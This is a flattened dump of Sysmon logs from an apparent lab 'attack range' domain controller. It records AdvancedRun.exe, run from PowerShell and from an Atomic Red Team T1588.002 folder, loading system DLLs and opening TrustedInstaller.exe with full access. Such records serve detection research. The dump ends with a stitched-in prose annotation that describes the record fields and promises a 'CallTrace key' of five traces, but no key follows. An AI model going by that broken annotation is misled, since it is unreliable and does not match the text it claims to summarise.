CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988582Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003988579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003988569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003988559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003988556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.739{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with 
different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003988555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.724{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003988554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.724{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a
4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.A
utomation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003988553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:06:31.736{834264DD-F627-61EA-BC04-000000002702}4596C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" -hC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003984011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003984009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003984008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 534500x80000000000000003984007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003984006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003984005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
All records in this span are Sysmon EventCode 10 (ProcessAccess), Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000, Channel Microsoft-Windows-Sysmon/Operational, Computer win-dc-mhaag-attack-range-139.attackrange.local, UtcTime 2022-01-21 17:59:08.366. Per-record fields: RecordNumber; Source = SourceProcessGUID, SourceProcessId, SourceThreadId, SourceImage, SourceUser; Target = TargetProcessGUID, TargetProcessId, TargetImage, TargetUser; GrantedAccess; CallTrace (by key below). The first record's header falls on the line before this span and the last record is cut off in the source.

CallTrace key (the five distinct traces in this span, verbatim):
